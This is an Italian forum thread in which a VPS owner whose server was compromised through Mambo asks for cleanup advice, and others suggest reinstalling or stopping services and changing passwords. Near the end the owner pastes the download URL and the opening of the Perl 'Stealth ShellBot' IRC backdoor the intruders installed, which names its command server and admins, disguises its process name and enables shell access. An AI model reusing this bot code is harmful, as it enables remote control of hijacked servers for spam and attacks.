Ciao, ho un VPS presso un hosting con suse 9.3 installato.
Sfortunatamente ho installato Mambo e sono riusciti a "entrare" e al momento mi "succhiano" banda e spammano attraverso il mio server.
Ho rimosso il sito in questione ma il danno sembra fatto.
Continuo ad avere sessioni e connessioni da esterni, non sono in panico, ma vorrei sapere come affrontare questo problema.
Qualche suggerimento?
Grazie!
Io mi farei piallare tutto il sistema dall'hosting
"Aiuterò le forze dell'ordine a sventrare eventuali truffatori, eventuali assassini che abbiano utilizzato l'informatica per fini malvagi"
Salvatore Aranzulla, 15 Aprile 2007, cognome&nome, La7
Be' mi sembra una soluzione definitiva...
Qualche altro suggerimento...?
stoppa tutti i servizi, cambia tutte le password e riavvia pian piano i servizi dopo averli bonificati
"Aiuterò le forze dell'ordine a sventrare eventuali truffatori, eventuali assassini che abbiano utilizzato l'informatica per fini malvagi"
Salvatore Aranzulla, 15 Aprile 2007, cognome&nome, La7
Hem, nn sono proprio bravo con Linux.
Qualche esempio?
P.s. dovro imparare prima o poi!
prendi un servizio managed se non sei buono
Per il paiola, se non hai nulla da fare risparmiati le lettere i tuoi commenti da saccente non mi servono.
Qualcuno puo' indirizzarmi a qualche risorsa?
Grazie
scoltaOriginariamente inviato da makmo
Per il paiola, se non hai nulla da fare risparmiati le lettere i tuoi commenti da saccente non mi servono.
sei tu che hai il server a donnine facili quindi i miei consigli ti servono eccome, e non solo i miei
gestire un server di produzione non lo impari manco in un anno di studio e a parte il fatto che non si smette mai di imparare, non posso fare altro che rinnovare il mio consiglio
magari prima di mettere le mani su server di produzione studia in locale anche tramite VM
saluti
risorsa per far che?Originariamente inviato da makmo
Qualcuno puo' indirizzarmi a qualche risorsa?
dovresti imparare a gestire sistemi e soprattutto in sicurezza
Ciao, io forse potrei aiutarti. Prova a chiedere in ordine cosa vorresti fare e che non ti riesce piano piano possiamo arrivare ad una soluzione.Originariamente inviato da makmo
Qualcuno puo' indirizzarmi a qualche risorsa?
Grazie
Ciao
LE DONNE:
COME E' POSSIBILE SPERARE DI CAPIRLE SE LORO STESSE NON RIESCONO A FARLO?
Grazie, questo e' il file di cui fanno il download:
http://usuarios.arnet.com.ar/adrikrasnow/sess_308b.txt
my $processo = 'etropchat';
if (`ps uxw` =~ /etropchat/)
{
exit;
}
$servidor='secure.sin-ip.es' unless $servidor;
my $porta='9010';
my @canais=("#sni-labs");
my @adms=("SPEED", "Mr_Nice", "C4Sh");
my $linas_max=10;
my $sleep=3;
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
my $version = "pwnt";
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
Permessi di invio
Rispondi quotando